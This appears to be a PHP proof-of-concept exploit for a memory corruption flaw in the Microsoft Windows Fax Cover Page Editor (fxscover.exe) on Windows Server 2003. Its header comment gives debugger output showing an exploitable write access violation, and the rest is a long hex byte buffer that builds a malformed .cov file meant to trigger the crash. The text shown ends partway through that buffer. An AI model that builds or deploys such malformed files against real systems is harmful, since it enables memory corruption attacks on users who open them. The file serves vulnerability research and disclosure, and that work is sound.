<?php
/*
Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption poc
by Andrea Micalizzi aka rgod

tested on: Microsoft Windows Server 2003 Standard Edition r2 sp2 all patched

vulnerability:
Microsoft Cover Page Editor (fxscover.exe, version 5.2 r2
(Build 3790.srv03_sp2_gdr.100216-1301: Service Pack 2)
as included in the mentioned operating system as a 
featured component crashes when opening .cov files 
(Fax Cover Page Files) with certain overlarge records

Debugging Tools for Windows show:

0:000> !load ./winext/msec.dll
...
(20d4.2728): C++ EH exception - code e06d7363 (first chance)
(20d4.2728): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00c6f118 ebx=00c6f118 ecx=41414141 edx=00c90d08 esi=00c6f110 edi=00270000
eip=7c83e790 esp=0006f084 ebp=0006f148 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010283
ntdll!RtlAbsoluteToSelfRelativeSD+0x5cd:
7c83e790 8901            mov     dword ptr [ecx],eax  ds:0023:41414141=????????
0:000> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlAbsoluteToSelfRelativeSD+0x00000000000005cd (Hash=0x7d7e510d.0x116d301c)

User mode write access violations that are not near NULL are exploitable.

code:
...
7c83e790 8901            mov     dword ptr [ecx],eax  ds:0023:41414141=???????? <---- crash
7c83e792 894204          mov     dword ptr [edx+4],eax
7c83e795 56              push    esi
7c83e796 ff75dc          push    dword ptr [ebp-24h]
7c83e799 e847befeff      call    ntdll!wcslen+0x47 (7c82a5e5)
7c83e79e 8b4de0          mov     ecx,dword ptr [ebp-20h]
7c83e7a1 8b45dc          mov     eax,dword ptr [ebp-24h]
7c83e7a4 014828          add     dword ptr [eax+28h],ecx
7c83e7a7 8b45d4          mov     eax,dword ptr [ebp-2Ch]
7c83e7aa 6685c0          test    ax,ax
...

at a first look this seems exploitable, we can write four bytes into an arbitrary location.
I'm posting a proof-of-concept written in php which creates a malformed .cov file.
Results may vary if the buffer is modified. Full exploit is in stage of developing.
*/

$buff=
"FAXCOVER-VER005w".
"\x87\x00\x00\x00\x4c\x17\x00\x00\x00\x00\x00\x00\x52\x03\x00\x00".
"\x4a\x04\x00\x00\x01\x00\x00\x00\x6c\x00\x00\x00\x64\xfe\xff\xff".
"\xa8\xfc\xff\xff\x7e\x16\x00\x00\x88\x0c\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x56\x54\x00\x00\xf1\x6c\x00\x00\x20\x45\x4d\x46".
"\x00\x00\x01\x00\x4c\x17\x00\x00\x0b\x00\x00\x00\x02\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\x13\x00\x00".
"\xc8\x19\x00\x00\xd8\x00\x00\x00\x17\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x4b\x03\x00\x68\x43\x04\x00".
"\x11\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x0a\x00\x00\x00".
"\x10\x00\x00\x00\x57\xfe\xff\xff\x25\x02\x00\x00\x25\x00\x00\x00".
"\x0c\x00\x00\x00\x05\x00\x00\x80\x26\x00\x00\x00\x1c\x00\x00\x00".
"\x01\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x25\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00".
"\x56\x00\x00\x00\x58\x16\x00\x00\x64\xfe\xff\xff\xa8\xfc\xff\xff".
"\x7e\x16\x00\x00\x88\x0c\x00\x00\x8f\x05\x00\x00\xe8\xfe\xc5\x01".
"\xe9\xfe\xc5\x01\xe8\xfe\xc5\x01\xe8\xfe\xc4\x01\xe8\xfe\xc3\x01".
"\xe9\xfe\xc2\x01\xeb\xfe\xc0\x01\xec\xfe\xbd\x01\xf0\xfe\xbb\x01".
"\xf0\xfe\xb9\x01\xf3\xfe\xb6\x01\xf5\xfe\xb1\x01\xf9\xfe\xae\x01".
"\x00\xff\xa3\x01\x06\xff\x97\x01\x11\xff\x8c\x01\x24\xff\x78\x01".
"\x3b\xff\x68\x01\x4c\xff\x59\x01\x5f\xff\x46\x01\x76\xff\x35\x01".
"\x8d\xff\x26\x01\x9f\xff\x1a\x01\xab\xff\x10\x01\xbb\xff\x09\x01".
"\xbe\xff\x05\x01\xc9\xff\x00\x01\xcd\xff\xff\x00\xd9\xff\xfa\x00".
"\xdb\xff\xfa\x00\xdd\xff\xf9\x00\xdf\xff\xf7\x00\xe1\xff\xf7\x00".
"\xe2\xff\xf7\x00\x19\x01\xba\x01\xd5\xff\x7f\x01\xd6\xff\x7f\x01".
"\xd4\xff\x7e\x01\xd2\xff\x7d\x01\xce\xff\x7d\x01\xcc\xff\x7c\x01".
"\xca\xff\x7a\x01\xc8\xff\x78\x01\xc6\xff\x77\x01\xc2\xff\x74\x01".
"\xc0\xff\x72\x01\xbd\xff\x70\x01\xba\xff\x6e\x01\xae\xff\x66\x01".
"\xab\xff\x64\x01\xa7\xff\x60\x01\xa4\xff\x5d\x01\xa0\xff\x5a\x01".
"\x9b\xff\x56\x01\x92\xff\x4a\x01\x8b\xff\x3e\x01\x89\xff\x3b\x01".
"\x86\xff\x36\x01\x83\xff\x33\x01\x80\xff\x28\x01\x7c\xff\x1c\x01".
"\x75\xff\x11\x01\x75\xff\x05\x01\x74\xff\x02\x01\x74\xff\xf8\x00".
"\x71\xff\xec\x00\x71\xff\xe9\x00\x71\xff\xe7\x00\x74\xff\xe4\x00".
"\x75\xff\xe1\x00\x77\xff\xe0\x00\x7a\xff\xdf\x00\x7c\xff\xdd\x00".
"\x7e\xff\xdd\x00\x80\xff\xdc\x00\x82\xff\xdb\x00\x85\xff\xdb\x00".
"\x87\xff\xdb\x00\x88\xff\xdb\x00\x8a\xff\xdb\x00\x8c\xff\xdb\x00".
"\x8e\xff\xdb\x00\x90\xff\xdc\x00\x93\xff\xdd\x00\x96\xff\xdf\x00".
"\xa3\xff\xe5\x00\xb5\xff\xf1\x00\xd2\xff\x02\x01\xef\xff\x1c\x01".
"\x09\x00\x3a\x01\x19\x00\x50\x01\x20\x00\x69\x01\x23\x00\x7c\x01".
"\x23\x00\x8e\x01\x1e\x00\x9d\x01\x18\x00\xab\x01\x11\x00\xb7\x01".
"\x0f\x00\xb9\x01\x0d\x00\xbc\x01\x0c\x00\xbd\x01\x0b\x00\xbe\x01".
"\x0a\x00\xbe\x01\x0a\x00\xbf\x01\x09\x00\xbf\x01\x08\x00\xbf\x01".
"\x07\x00\xbf\x01\x05\x00\xbf\x01\x03\x00\xbf\x01\xff\xff\xbf\x01".
"\xfd\xff\xbf\x01\xfb\xff\xbe\x01\xf8\xff\xbc\x01\xf5\xff\xbb\x01".
"\xf3\xff\xb9\x01\xf1\xff\xb7\x01\xef\xff\xb6\x01\xed\xff\xb3\x01".
"\xec\xff\xb2\x01\xea\xff\xb0\x01\xea\xff\xaf\x01\xe9\xff\xae\x01".
"\xe7\xff\xac\x01\xe6\xff\xab\x01\xe4\xff\xa9\x01\xe3\xff\xa7\x01".
"\xe1\xff\xa5\x01\xdf\xff\xa3\x01\xde\xff\x9f\x01\xdc\xff\x9e\x01".
"\xdb\xff\x9d\x01\xd9\xff\x99\x01\xd9\xff\x98\x01\xd7\xff\x96\x01".
"\xd6\xff\x94\x01\xd4\xff\x93\x01\xd3\xff\x91\x01\xd0\xff\x8e\x01".
"\xce\xff\x8c\x01\xcc\xff\x8a\x01\xc9\xff\x88\x01\xc7\xff\x86\x01".
"\xc5\xff\x84\x01\xc3\xff\x81\x01\xc2\xff\x80\x01\xc0\xff\x7e\x01".
"\xbe\xff\x7e\x01\xbd\xff\x7c\x01\xbc\xff\x7c\x01\xba\xff\x7a\x01".
"\xb9\xff\x78\x01\xb9\xff\x77\x01\xb8\xff\x75\x01\xb8\xff\x74\x01".
"\xb8\xff\x71\x01\xb8\xff\x6f\x01\xb8\xff\x6d\x01\xba\xff\x6b\x01".
"\xbc\xff\x67\x01\xbf\xff\x64\x01\xc2\xff\x62\x01\xc5\xff\x60\x01".
"\xd1\xff\x5e\x01\xd4\xff\x5c\x01\xdf\xff\x5a\x01\xeb\xff\x58\x01".
"\xf6\xff\x58\x01\x04\x00\x58\x01\x11\x00\x58\x01\x20\x00\x5d\x01".
"\x2b\x00\x62\x01\x37\x00\x66\x01\x42\x00\x6b\x01\x4e\x00\x70\x01".
"\x52\x00\x72\x01\x55\x00\x74\x01\x57\x00\x76\x01\x5a\x00\x79\x01".
"\x5a\x00\x7a\x01\x5a\x00\x7c\x01\x5a\x00\x7d\x01\x5a\x00\x7f\x01".
"\x58\x00\x80\x01\x57\x00\x82\x01\x53\x00\x86\x01\x51\x00\x87\x01".
"\x46\x00\x8b\x01\x35\x00\x8e\x01\x1f\x00\x8e\x01\x02\x00\x8e\x01".
"\xe4\xff\x8b\x01\xc6\xff\x85\x01\xab\xff\x77\x01\x8a\xff\x68\x01".
"\x73\xff\x54\x01\x56\xff\x3f\x01\x3a\xff\x2d\x01\x2b\xff\x1b\x01".
"\x26\xff\x0f\x01\x24\xff\x04\x01\x23\xff\x01\x01\x23\xff\xfd\x00".
"\x28\xff\xf2\x00\x2b\xff\xef\x00\x32\xff\xe3\x00\x3c\xff\xd7\x00".
"\x48\xff\xcd\x00\x4c\xff\xc9\x00\x58\xff\xc2\x00\x66\xff\xbe\x00".
"\x7e\xff\xba\x00\x8c\xff\xb8\x00\x9c\xff\xb8\x00\xb4\xff\xbc\x00".
"\xce\xff\xc2\x00\xe3\xff\xcb\x00\xfe\xff\xd9\x00\x15\x00\xe9\x00".
"\x28\x00\xfc\x00\x34\x00\x0d\x01\x3f\x00\x1e\x01\x4f\x00\x30\x01".
"\x61\x00\x43\x01\x74\x00\x57\x01\x83\x00\x68\x01\x8b\x00\x78\x01".
"\x8e\x00\x7c\x01\x8e\x00\x7f\x01\x8e\x00\x81\x01\x8e\x00\x84\x01".
"\x8b\x00\x87\x01\x89\x00\x8a\x01\x79\x00\x91\x01\x5e\x00\x9f\x01".
"\x3b\x00\xa6\x01\x12\x00\xa9\x01\xe3\xff\xad\x01\xb7\xff\xad\x01".
"\x89\xff\xaa\x01\x5e\xff\x9f\x01\x38\xff\x8f\x01\x18\xff\x80\x01".
"\x03\xff\x78\x01\xff\xfe\x74\x01\xfd\xfe\x71\x01\xfc\xfe\x6f\x01".
"\xfc\xfe\x6d\x01\xfc\xfe\x6c\x01\xfe\xfe\x69\x01\x00\xff\x67\x01".
"\x03\xff\x66\x01\x08\xff\x63\x01\x13\xff\x5c\x01\x25\xff\x57\x01".
"\x35\xff\x4f\x01\x4f\xff\x45\x01\x69\xff\x3c\x01\x89\xff\x34\x01".
"\xa6\xff\x31\x01\xbe\xff\x2e\x01\xd0\xff\x2e\x01\xda\xff\x2e\x01".
"\xe5\xff\x33\x01\xe7\xff\x34\x01\xe9\xff\x36\x01\xea\xff\x36\x01".
"\xeb\xff\x37\x01\xeb\xff\x39\x01\xeb\xff\x3a\x01\xeb\xff\x3b\x01".
"\xeb\xff\x3c\x01\xeb\xff\x3d\x01\xea\xff\x3e\x01\xe7\xff\x3f\x01".
"\xdd\xff\x41\x01\xc8\xff\x41\x01\xa6\xff\x41\x01\x8a\xff\x41\x01".
"\x6e\xff\x41\x01\x5c\xff\x41\x01\x51\xff\x41\x01\x4f\xff\x41\x01".
"\x4f\xff\x40\x01\x4e\xff\x3f\x01\x4e\xff\x3e\x01\x4f\xff\x3b\x01".
"\x50\xff\x39\x01\x55\xff\x36\x01\x67\xff\x2e\x01\x7b\xff\x28\x01".
"\x99\xff\x25\x01\xb5\xff\x25\x01\xd2\xff\x25\x01\xe3\xff\x25\x01".
"\xf1\xff\x25\x01\xf4\xff\x26\x01\xf4\xff\x27\x01\xf5\xff\x27\x01".
"\xf6\xff\x28\x01\xf6\xff\x29\x01\xf5\xff\x2a\x01\xf3\xff\x2c\x01".
"\xef\xff\x2e\x01\xdc\xff\x35\x01\xc7\xff\x3f\x01\xb3\xff\x45\x01".
"\xa1\xff\x47\x01\x8f\xff\x47\x01\x85\xff\x47\x01\x81\xff\x47\x01".
"\x7f\xff\x46\x01\x7f\xff\x45\x01\x7e\xff\x44\x01\x7e\xff\x43\x01".
"\x7e\xff\x42\x01\x7f\xff\x42\x01\x0c\xff\xd9\x01\x0d\xff\xd9\x01".
"\x0c\xff\xd8\x01\x0d\xff\xd7\x01\x0e\xff\xd5\x01\x10\xff\xd4\x01".
"\x12\xff\xd1\x01\x14\xff\xd0\x01\x16\xff\xcd\x01\x17\xff\xcd\x01".
"\x18\xff\xcb\x01\x1b\xff\xc9\x01\xcc\xff\xaf\x01\xcd\xff\xaf\x01".
"\xd7\xff\xb3\x01\xda\xff\xb4\x01\xe7\xff\xb7\x01\xf3\xff\xba\x01".
"\xfe\xff\xba\x01\x0a\x00\xba\x01\x14\x00\xba\x01\x17\x00\xba\x01".
"\x1b\x00\xba\x01\x1e\x00\xba\x01\x21\x00\xb9\x01\x24\x00\xb9\x01".
"\x26\x00\xb9\x01\x30\x00\xb7\x01\x3c\x00\xb4\x01\x49\x00\xb1\x01".
"\x5b\x00\xaf\x01\x69\x00\xaf\x01\x7a\x00\xad\x01\x89\x00\xab\x01".
"\x9a\x00\xab\x01\xa7\x00\xab\x01\xb5\x00\xab\x01\xc3\x00\xab\x01".
"\xd1\x00\xab\x01\xde\x00\xa9\x01\xed\x00\xa7\x01\xfa\x00\xa7\x01".
"\x08\x01\xa5\x01\x17\x01\xa3\x01\x2c\x01\x9e\x01\x45\x01\x97\x01".
"\x61\x01\x8a\x01\x84\x01\x86\x01\x9c\x01\x82\x01\xab\x01\x7e\x01".
"\xb6\x01\x7e\x01\xb9\x01\x7e\x01\xba\x01\x7d\x01\xbc\x01\x7d\x01".
"\xbb\x01\x7d\x01\xba\x01\x7d\x01\xb8\x01\x7c\x01\xac\x01\x78\x01".
"\x8c\x01\x6e\x01\x63\x01\x62\x01\x39\x01\x5b\x01\x0a\x01\x53\x01".
"\xc4\x00\x46\x01\x85\x00\x3a\x01\x4a\x00\x2d\x01\x05\x00\x20\x01".
"\xc5\xff\x17\x01\x90\xff\x0b\x01\x66\xff\x03\x01\x43\xff\xfc\x00".
"\x2b\xff\xf9\x00\x11\xff\xf0\x00\xfb\xfe\xe6\x00\xe1\xfe\xdd\x00".
"\xcc\xfe\xd3\x00\xb0\xfe\xc2\x00\x9e\xfe\xb3\x00\x8d\xfe\xa8\x00".
"\x89\xfe\xa4\x00\x85\xfe\xa1\x00\x83\xfe\x9f\x00\x82\xfe\x9e\x00".
"\x82\xfe\x9d\x00\x81\xfe\x9d\x00\x81\xfe\x9c\x00\x81\xfe\x9b\x00".
"\x82\xfe\x9b\x00\x83\xfe\x9b\x00\x85\xfe\x9c\x00\x87\xfe\x9e\x00".
"\x88\xfe\x9e\x00\x8c\xfe\xa1\x00\x8d\xfe\xa5\x00\x8d\xfe\xb0\x00".
"\x91\xfe\xbe\x00\x93\xfe\xcc\x00\x93\xfe\xda\x00\x93\xfe\xe7\x00".
"\x90\xfe\xf6\x00\x8e\xfe\x08\x01\x8c\xfe\x15\x01\x8c\xfe\x23\x01".
"\x8f\xfe\x31\x01\x99\xfe\x3e\x01\x9b\xfe\x41\x01\xa5\xfe\x4d\x01".
"\xb1\xfe\x57\x01\xc3\xfe\x62\x01\xd7\xfe\x68\x01\xfa\xfe\x70\x01".
"\x1e\xff\x77\x01\x4b\xff\x77\x01\x7e\xff\x77\x01\xb2\xff\x70\x01".
"\xe6\xff\x67\x01\x10\x00\x60\x01\x2f\x00\x56\x01\x45\x00\x4c\x01".
"\x51\x00\x48\x01\x53\x00\x47\x01\x54\x00\x45\x01\x56\x00\x45\x01".
"\x57\x00\x43\x01\x58\x00\x41\x01\x59\x00\x3f\x01\x5a\x00\x3c\x01".
"\x5f\x00\x30\x01\x61\x00\x25\x01\x63\x00\x19\x01\x60\x00\x0c\x01".
"\x5f\x00\x09\x01\x5d\x00\xfd\x00\x57\x00\xf2\x00\x55\x00\xee\x00".
"\x51\x00\xea\x00\x47\x00\xde\x00\x44\x00\xdd\x00\x42\x00\xdc\x00".
"\x3f\x00\xdc\x00\x3c\x00\xdc\x00\x2f\x00\xe1\x00\x1e\x00\xeb\x00".
"\x10\x00\xf9\x00\xfe\xff\x09\x01\xe9\xff\x15\x01\xd0\xff\x2d\x01".
"\xb8\xff\x46\x01\xa7\xff\x5d\x01\x98\xff\x6f\x01\x88\xff\x86\x01".
"\x7f\xff\x96\x01\x7a\xff\xa5\x01\x76\xff\xb0\x01\x75\xff\xb3\x01".
"\x75\xff\xb6\x01\x75\xff\xb9\x01\x76\xff\xbc\x01\x78\xff\xbe\x01".
"\x7b\xff\xc0\x01\x7d\xff\xc2\x01\x87\xff\xc5\x01\x92\xff\xc8\x01".
"\xa8\xff\xca\x01\xbf\xff\xca\x01\xdb\xff\xca\x01\x05\x00\xc3\x01".
"\x29\x00\xbc\x01\x4f\x00\xad\x01\x75\x00\x99\x01\x95\x00\x88\x01".
"\xb7\x00\x75\x01\xce\x00\x64\x01\xe0\x00\x56\x01\xec\x00\x44\x01".
"\xf2\x00\x39\x01\xf9\x00\x2d\x01\xff\x00\x1b\x01\x03\x01\x0f\x01".
"\x06\x01\xfe\x00\x08\x01\xf3\x00\x0a\x01\xe4\x00\x0a\x01\xd3\x00".
"\x0a\x01\xc6\x00\x07\x01\xb8\x00\x00\x01\xa9\x00\xf7\x00\x99\x00".
"\xee\x00\x8d\x00\xe0\x00\x7f\x00\xd5\x00\x78\x00\xc5\x00\x6d\x00".
"\xab\x00\x64\x00\x94\x00\x64\x00\x83\x00\x64\x00\x66\x00\x68\x00".
"\x4a\x00\x76\x00\x2a\x00\x84\x00\x0c\x00\x9d\x00\xe4\xff\xb9\x00".
"\xc1\xff\xdd\x00\x9e\xff\x01\x01\x7d\xff\x29\x01\x5d\xff\x52\x01".
"\x38\xff\x7a\x01\x1c\xff\xa2\x01\x04\xff\xc9\x01\xf3\xfe\xea\x01".
"\xe4\xfe\x0b\x02\xda\xfe\x25\x02\xd0\xfe\x3f\x02\xce\xfe\x4d\x02".
"\xce\xfe\x5b\x02\xcb\xfe\x66\x02\xcb\xfe\x71\x02\xcf\xfe\x7d\x02".
"\xd2\xfe\x81\x02\xdc\xfe\x8c\x02\xe8\xfe\x96\x02\xf4\xfe\x9d\x02".
"\x0b\xff\xa5\x02\x24\xff\xac\x02\x47\xff\xb0\x02\x9c\xff\xb3\x02".
"\xc9\xff\xb3\x02\xf7\xff\xb3\x02\x2c\x00\xa7\x02\x5b\x00\x9f\x02".
"\x89\x00\x98\x02\xb9\x00\x8b\x02\xdc\x00\x88\x02\x00\x01\x81\x02".
"\x3c\x01\x76\x02\x5a\x01\x70\x02\x76\x01\x62\x02\x92\x01\x55\x02".
"\xac\x01\x4b\x02\xc2\x01\x3b\x02\xd9\x01\x2a\x02\xf9\x01\x0e\x02".
"\x03\x02\x02\x02\x0c\x02\xf5\x01\x0f\x02\xe8\x01\x14\x02\xdc\x01".
"\x14\x02\xd1\x01\x16\x02\xc3\x01\x16\x02\xb1\x01\x16\x02\xa1\x01".
"\x13\x02\x8e\x01\x10\x02\x71\x01\x04\x02\x46\x01\xf6\x01\x26\x01".
"\xde\x01\xfe\x00\xcb\x01\xd9\x00\xa0\x01\x9e\x00\x8a\x01\x82\x00".
"\x75\x01\x6a\x00\x5e\x01\x5a\x00\x4e\x01\x4e\x00\x37\x01\x3d\x00".
"\x23\x01\x38\x00\x09\x01\x32\x00\xf2\x00\x32\x00\xd1\x00\x32\x00".
"\xad\x00\x36\x00\x8c\x00\x49\x00\x67\x00\x58\x00\x41\x00\x66\x00".
"\xff\xff\x87\x00\xe3\xff\x9d\x00\xc7\xff\xab\x00\xb0\xff\xba\x00".
"\x99\xff\xcf\x00\x88\xff\xdb\x00\x7b\xff\xe4\x00\x72\xff\xf1\x00".
"\x6e\xff\xf5\x00\x67\xff\x00\x01\x60\xff\x0c\x01\x5e\xff\x17\x01".
"\x5e\xff\x1a\x01\x5e\xff\x24\x01\x5e\xff\x2f\x01\x62\xff\x3e\x01".
"\x68\xff\x57\x01\x7a\xff\x73\x01\x8b\xff\x8a\x01\x9c\xff\xa6\x01".
"\xb4\xff\xbf\x01\xcd\xff\xd7\x01\xeb\xff\xf1\x01\x07\x00\x03\x02".
"\x28\x00\x18\x02\x4f\x00\x28\x02\x6e\x00\x33\x02\x8d\x00\x3d\x02".
"\xaa\x00\x40\x02\xc7\x00\x40\x02\xde\x00\x40\x02\xf0\x00\x3e\x02".
"\x05\x01\x38\x02\x10\x01\x32\x02\x12\x01\x2e\x02\x16\x01\x2b\x02".
"\x17\x01\x29\x02\x19\x01\x26\x02\x19\x01\x17\x02\x19\x01\xfc\x01".
"\x12\x01\xe8\x01\x09\x01\xd3\x01\x01\x01\xbe\x01\xf3\x00\xa3\x01".
"\xe8\x00\x91\x01\xd5\x00\x7e\x01\xc1\x00\x6c\x01\xaa\x00\x5b\x01".
"\x93\x00\x4b\x01\x5f\x00\x36\x01\x3b\x00\x30\x01\x18\x00\x2c\x01".
"\xf6\xff\x2c\x01\xce\xff\x2c\x01\xac\xff\x30\x01\x81\xff\x3c\x01".
"\x5c\xff\x4a\x01\x3c\xff\x59\x01\x1b\xff\x67\x01\x00\xff\x75\x01".
"\xe9\xfe\x81\x01\xd9\xfe\x8d\x01\xc7\xfe\x9d\x01\xb5\xfe\xa7\x01".
"\xb2\xfe\xaa\x01\xaf\xfe\xae\x01\xae\xfe\xaf\x01\xae\xfe\xb1\x01".
"\xae\xfe\xb4\x01\xae\xfe\xb8\x01\xb0\xfe\xbb\x01\xb2\xfe\xbf\x01".
"\xb9\xfe\xcd\x01\xbe\xfe\xd9\x01\xc2\xfe\xdd\x01\xd9\xfe\xf6\x01".
"\xf0\xfe\x07\x02\x0a\xff\x11\x02\x24\xff\x1b\x02\x42\xff\x1e\x02".
"\x5e\xff\x1e\x02\x7f\xff\x1e\x02\xa2\xff\x1e\x02\xc0\xff\x17\x02".
"\xe4\xff\x10\x02\x04\x00\x06\x02\x35\x00\xef\x01\x44\x00\xe8\x01".
"\x52\x00\xda\x01\x5d\x00\xd0\x01\x61\x00\xcc\x01\x69\x00\xc1\x01".
"\x74\x00\xad\x01\x78\x00\x9f\x01\x7d\x00\x90\x01\x83\x00\x80\x01".
"\x85\x00\x6e\x01\x85\x00\x60\x01\x85\x00\x4f\x01\x82\x00\x42\x01".
"\x7d\x00\x33\x01\x78\x00\x28\x01\x74\x00\x1c\x01\x6d\x00\x11\x01".
"\x6a\x00\x0d\x01\x5c\x00\x00\x01\x4d\x00\xf8\x00\x3e\x00\xf3\x00".
"\x2b\x00\xf1\x00\x19\x00\xf1\x00\x02\x00\xf4\x00\xe6\xff\x01\x01".
"\xc7\xff\x0d\x01\xa6\xff\x1e\x01\x7f\xff\x36\x01\x67\xff\x4a\x01".
"\x4a\xff\x64\x01\x35\xff\x7c\x01\x23\xff\x8f\x01\x13\xff\xa1\x01".
"\x0a\xff\xad\x01\xff\xfe\xba\x01\xf9\xfe\xc5\x01\xf4\xfe\xd1\x01".
"\xf2\xfe\xdc\x01\xf1\xfe\xdf\x01\xf1\xfe\xe2\x01\xf1\xfe\xe5\x01".
"\xf1\xfe\xe9\x01\xf2\xfe\xf3\x01\xf4\xfe\xf6\x01\xf6\xfe\xf9\x01".
"\xfc\xfe\x05\x02\x0a\xff\x11\x02\x15\xff\x1c\x02\x2b\xff\x28\x02".
"\x46\xff\x32\x02\x69\xff\x39\x02\x8d\xff\x3d\x02\xae\xff\x3d\x02".
"\xd6\xff\x3d\x02\xfb\xff\x33\x02\x19\x00\x2b\x02\x39\x00\x21\x02".
"\x55\x00\x13\x02\x6b\x00\x07\x02\x78\x00\xf9\x01\x7b\x00\xf6\x01".
"\x85\x00\xea\x01\x87\x00\xe6\x01\x8b\x00\xdb\x01\x90\x00\xd0\x01".
"\x92\x00\xc1\x01\x92\x00\xb3\x01\x92\x00\xa9\x01\x92\x00\x97\x01".
"\x8f\x00\x8a\x01\x8b\x00\x7b\x01\x82\x00\x66\x01\x78\x00\x5a\x01".
"\x6e\x00\x4d\x01\x6c\x00\x4a\x01\x54\x00\x3f\x01\x48\x00\x3a\x01".
"\x3b\x00\x3a\x01\x22\x00\x3a\x01\xfc\xff\x45\x01\xc7\xff\x5e\x01".
"\xb0\xff\x6f\x01\xa4\xff\x78\x01\x9c\xff\x7d\x01\x9c\xff\x7f\x01".
"\x9a\xff\x80\x01\x9a\xff\x81\x01\x99\xff\x82\x01\x99\xff\x84\x01".
"\x99\xff\x85\x01\x99\xff\x86\x01\x9a\xff\x87\x01\x9e\xff\x8b\x01".
"\xa9\xff\x8f\x01\xbc\xff\x94\x01\xda\xff\x9b\x01\x08\x00\x9f\x01".
"\x30\x00\xa3\x01\x5d\x00\xa3\x01\x85\x00\xa3\x01\xa8\x00\xa0\x01".
"\xda\x00\x97\x01\xe8\x00\x94\x01\xf6\x00\x90\x01\xf9\x00\x8e\x01".
"\xfc\x00\x8d\x01\xff\x00\x8b\x01\x01\x01\x89\x01\x03\x01\x87\x01".
"\x04\x01\x85\x01\x05\x01\x82\x01\x05\x01\x80\x01\x05\x01\x7d\x01".
"\x04\x01\x7a\x01\x02\x01\x77\x01\x01\x01\x75\x01\x00\x01\x74\x01".
"\xff\x00\x73\x01\xfd\x00\x72\x01\xfa\x00\x71\x01\xf7\x00\x71\x01".
"\xf4\x00\x72\x01\xe9\x00\x77\x01\xda\x00\x7b\x01\xc4\x00\x88\x01".
"\xae\x00\x95\x01\x8b\x00\xaf\x01\x79\x00\xbe\x01\x67\x00\xd2\x01".
"\x53\x00\xe4\x01\x4d\x00\xf0\x01\x38\x00\x0c\x02\x34\x00\x17\x02".
"\x2e\x00\x23\x02\x2a\x00\x2e\x02\x29\x00\x32\x02\x28\x00\x35\x02".
"\x27\x00\x37\x02\x25\x00\x3a\x02\x25\x00\x3c\x02\x25\x00\x3d\x02".
"\x25\x00\x3e\x02\x25\x00\x3f\x02\x26\x00\x40\x02\x2a\x00\x41\x02".
"\x38\x00\x41\x02\x55\x00\x3f\x02\x78\x00\x3b\x02\x9f\x00\x28\x02".
"\xc3\x00\x1d\x02\xe4\x00\x0e\x02\xff\x00\x01\x02\x15\x01\xf8\x01".
"\x21\x01\xee\x01\x24\x01\xec\x01\x25\x01\xe9\x01\x27\x01\xe5\x01".
"\x2a\x01\xe0\x01\x2b\x01\xdd\x01\x2c\x01\xdb\x01\x2f\x01\xd1\x01".
"\x2f\x01\xcd\x01\x2f\x01\xc4\x01\x2f\x01\xb9\x01\x29\x01\xad\x01".
"\x22\x01\x9e\x01\x1d\x01\x92\x01\x1c\x01\x8f\x01\x19\x01\x8d\x01".
"\x17\x01\x8b\x01\x11\x01\x87\x01\x0d\x01\x86\x01\x03\x01\x86\x01".
"\xf2\x00\x86\x01\xdb\x00\x86\x01\xc8\x00\x89\x01\xb6\x00\x8c\x01".
"\x7f\x00\x95\x01\x5f\x00\xa0\x01\x40\x00\xaa\x01\x25\x00\xb8\x01".
"\xff\xff\xc7\x01\xdf\xff\xd6\x01\xcc\xff\xe4\x01\xbc\xff\xf0\x01".
"\xb1\xff\xfc\x01\xae\xff\x01\x02\xae\xff\x03\x02\xae\xff\x05\x02".
"\xad\xff\x07\x02\xac\xff\x08\x02\xac\xff\x0a\x02\xad\xff\x0b\x02".
"\xaf\xff\x0d\x02\xb2\xff\x0e\x02\xc0\xff\x10\x02\xf3\xff\x13\x02".
"\x19\x00\x13\x02\x49\x00\x08\x02\x73\x00\x01\x02\x9d\x00\xf9\x01".
"\xb7\x00\xef\x01\xcd\x00\xe2\x01\xd8\x00\xdb\x01\xdc\x00\xd9\x01".
"\xdf\x00\xd5\x01\xe3\x00\xd2\x01\xe7\x00\xc6\x01\xec\x00\xbf\x01".
"\xf0\x00\xb0\x01\xf2\x00\xa5\x01\xf5\x00\x99\x01\xf5\x00\x8c\x01".
"\xf2\x00\x76\x01\xf1\x00\x73\x01\xef\x00\x70\x01\xec\x00\x6c\x01".
"\xeb\x00\x6b\x01\xe9\x00\x68\x01\xde\x00\x63\x01\xcc\x00\x5b\x01".
"\xb4\x00\x58\x01\x95\x00\x55\x01\x78\x00\x52\x01\x34\x00\x56\x01".
"\x0a\x00\x5d\x01\xec\xff\x64\x01\xcb\xff\x6f\x01\xb0\xff\x7c\x01".
"\x90\xff\x8b\x01\x7b\xff\x93\x01\x66\xff\x9d\x01\x50\xff\xa9\x01".
"\x31\xff\xb6\x01\x1c\xff\xbf\x01\x0c\xff\xc7\x01\x09\xff\xc9\x01".
"\xfd\xfe\xcf\x01\xf2\xfe\xd3\x01\xe6\xfe\xd8\x01\xdb\xfe\xdc\x01".
"\xcf\xfe\xe0\x01\xc1\xfe\xe5\x01\xbf\xfe\xe8\x01\xb9\xfe\xe9\x01".
"\xb8\xfe\xe9\x01\xb7\xfe\xe9\x01\xb6\xfe\xe9\x01\xb5\xfe\xe8\x01".
"\xb3\xfe\xe6\x01\xb1\xfe\xe3\x01\xad\xfe\xe0\x01\xa4\xfe\xd4\x01".
"\x91\xfe\xa5\x01\x86\xfe\x8b\x01\x7d\xfe\x75\x01\x74\xfe\x5b\x01".
"\x6c\xfe\x3d\x01\x6a\xfe\x2a\x01\x6a\xfe\x13\x01\x6a\xfe\x02\x01".
"\x6a\xfe\xf4\x00\x6f\xfe\xe2\x00\x74\xfe\xd7\x00\x7b\xfe\xc7\x00".
